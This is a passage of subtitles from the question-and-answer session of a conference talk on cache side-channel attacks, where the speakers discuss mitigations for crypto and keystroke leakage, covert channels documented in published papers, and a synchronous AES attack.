to mitigate this kind of attack? By, for
-
example switching off TSX or using ECC
RAM.
-
CM: So, I think the very important thing
to protect would be, like crypto, and the
-
good thing is that today we know how to
build crypto that is resistant to side-
-
channel attacks. So the good thing would
be to stop improving implementation that
-
are known to be vulnerable for 10 years.
Then things like keystrokes is way harder
-
to protect, so let's say crypto is
manageable; the whole system is clearly
-
another problem. And you can have
different types of countermeasure on the
-
hardware side but it does would mean that
Intel an ARM actually want to fix that,
-
and that they know how to fix that. I
don't even know how to fix that in
-
hardware. Then on the system side, if you
prevent some kind of memory sharing, you
-
don't have flush involved anymore
and primum (?) probably is much more
-
noisier, so it would be an improvement.
M: Thank you.
-
H: Do we have signal angel questions? No.
OK, then more microphone.
-
M: Hi, thank you. I wanted to ask about
the way you establish the side-channel
-
between the two processors, because it
would obviously have to be timed in a way to
-
transmit information between one process
to the other. Is there anywhere that you
-
documented the whole? You know, it's
actually almost like the seven layers or
-
something like that. There are any ways
that you documented that? It would be
-
really interesting to know how it worked.
ML: You can find this information in the
-
paper because there are several papers on
covered channels using that, so the NDSS
-
paper is published in February I guess,
but the Armageddon paper also includes
-
a cover channel, and you can
find more information about how the
-
packets look like and how the
synchronization works in the paper.
-
M: Thank you.
H: One last question?
-
M: Hi! You mentioned that you used Osvik's
attack for the AES side-channel attack.
-
Did you solve the AES round detection and
is it different to some scheduler
-
manipulation?
CM: So on this one I think we only did
-
some synchronous attack, so we already
knew when
-
the victim is going to be scheduled and
we didn't have anything to do with
-
schedulers.
M: Alright, thank you.
-
H: Are there any more questions? No, I
don't see anyone. Then, thank you very
-
much again to our speakers.
-
applause
-
music
-
subtitles created by c3subtitles.de
in the year 2020. Join, and help us!